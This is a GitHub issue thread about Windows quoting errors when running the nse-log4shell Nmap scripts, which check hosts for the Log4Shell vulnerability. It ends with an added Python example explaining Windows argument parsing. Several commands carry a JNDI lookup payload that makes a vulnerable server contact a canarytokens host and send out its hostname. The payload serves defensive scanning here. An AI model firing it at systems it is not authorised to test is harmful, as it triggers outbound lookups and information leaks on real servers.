Diverto / nse-log4shell

Nmap NSE scripts to check against log4shell or LogJam vulnerabilities (CVE-2021-44228)
MIT License

Failed to initialize script engine - Arguments did not parse #9

Open maxdemajo opened 2 years ago

maxdemajo commented 2 years ago

Running Nmap on Windows:

.\nmap.exe --script=http-log4shell,ssh-log4shell,imap-log4shell '--script-args=log4shell.payload="${jndi:ldap://x${hostName}.L4J.xxxx.canarytokens.com/a}"' -T4 -n -p80 --script-timeout=1m 10.0.0.1

I get the following error:

Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-16 16:23 W. Europe Standard Time
NSE: args = log4shell.payload=${jndi:ldap://x${hostName}.L4J.xxxx.canarytokens.com/a}
NSE: failed to initialize the script engine:
C:\Users\User\Downloads\nmap-7.92-win32/nse_main.lua:1276: arguments did not parse!
stack traceback:
        [C]: in function 'error'
        C:\Users\User\Downloads\nmap-7.92-win32/nse_main.lua:1276: in main chunk
        [C]: in ?

QUITTING!

Scripts are in the same directory as nmap. Any ideas?

kost commented 2 years ago

Hello!

Thanks for reporting. Since it is Windows, you should use the following escaping:

.\nmap.exe --script=http-log4shell,ssh-log4shell,imap-log4shell,smtp-log4shell "--script-args=log4shell.payload=\"${jndi:ldap://x${hostName}.L4J.xxxx.canarytokens.com/a}\"" -T4 -n -p80 --script-timeout=1m 10.0.0.1

According to: https://nmap.org/book/nse-usage.html#nse-args

Let me know if it works for you!

kost-div commented 2 years ago

Did you manage to get it working?

maxdemajo commented 2 years ago

> Hello!
>
> Thanks for reporting. Since it is Windows, you should use the following escaping:
>
> .\nmap.exe --script=http-log4shell,ssh-log4shell,imap-log4shell,smtp-log4shell "--script-args=log4shell.payload=\"${jndi:ldap://x${hostName}.L4J.xxxx.canarytokens.com/a}\"" -T4 -n -p80 --script-timeout=1m 10.0.0.1
>
> According to: https://nmap.org/book/nse-usage.html#nse-args
>
> Let me know if it works for you!

Thanks for your response :)

Nmap complains if you don't add ticks (`) before the curly brackets, so I added them and was able to begin the scan. I am getting a new error but haven't looked into it properly yet: Unable to split netmask from target expression: "${jndi:ldap://x${hostName}.L4J.XXXXXXXXXXXX.canarytokens.com/a}\"

kost-div commented 2 years ago

Usually that means escaping was not good. Add -d to the command line, so you can check how it interpreted those script-args, so you got that error message.

Have you tried with the basic scan?

cd nse-log4shell
nmap.exe -sV -T4 -v --script=%cd%/ scanme.nmap.org
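
The "NSE: args =" line in the first comment shows the payload arriving without its double quotes. The following added example (not from the thread or the nse-log4shell project) models the documented Microsoft C runtime argv rules to show why the \" form keeps them; the raw command lines are assumptions about what the shell hands to nmap.exe, and the function names are hypothetical.

```python
# Added example: a model of the documented Microsoft C runtime argv rules (whitespace
# splits, "..." groups, \" is a literal quote). The ""-inside-quotes case is not modelled.
PAYLOAD = "${jndi:ldap://x${hostName}.L4J.xxxx.canarytokens.com/a}"  # from the thread

def split_windows_cmdline(cmdline):
    """Split a raw command line the way an MSVC-built program receives argv."""
    args, cur, in_quotes, have_arg = [], [], False, False
    i, n = 0, len(cmdline)
    while i < n:
        ch = cmdline[i]
        if ch == "\\":
            j = i
            while j < n and cmdline[j] == "\\":
                j += 1
            run = j - i
            if j < n and cmdline[j] == '"':
                cur.append("\\" * (run // 2))  # backslashes before a quote are halved
                if run % 2:                    # odd run: the quote itself is literal
                    cur.append('"')
                    j += 1
            else:
                cur.append("\\" * run)         # elsewhere backslashes are literal
            i, have_arg = j, True
        elif ch == '"':
            in_quotes, have_arg = not in_quotes, True  # a bare quote only toggles grouping
            i += 1
        elif ch in " \t" and not in_quotes:
            if have_arg:
                args.append("".join(cur))
            cur, have_arg = [], False
            i += 1
        else:
            cur.append(ch)
            i, have_arg = i + 1, True
    if have_arg:
        args.append("".join(cur))
    return args

def script_args_value(raw_cmdline):
    """Return what nmap would receive as the --script-args value, or None."""
    prefix = "--script-args="
    return next((a[len(prefix):] for a in split_windows_cmdline(raw_cmdline)
                 if a.startswith(prefix)), None)

# Assumed raw command lines reaching nmap.exe (constructed, shortened from the thread).
UNESCAPED = 'nmap.exe --script-args=log4shell.payload="' + PAYLOAD + '" -p80 10.0.0.1'
ESCAPED = 'nmap.exe "--script-args=log4shell.payload=\\"' + PAYLOAD + '\\"" -p80 10.0.0.1'

print(script_args_value(UNESCAPED))  # quotes consumed as grouping, braces left bare
print(script_args_value(ESCAPED))    # quotes survive, so the value stays a quoted string
```

In the first case the value reaches the NSE argument parser with bare braces, which matches the "NSE: args =" output quoted in the report.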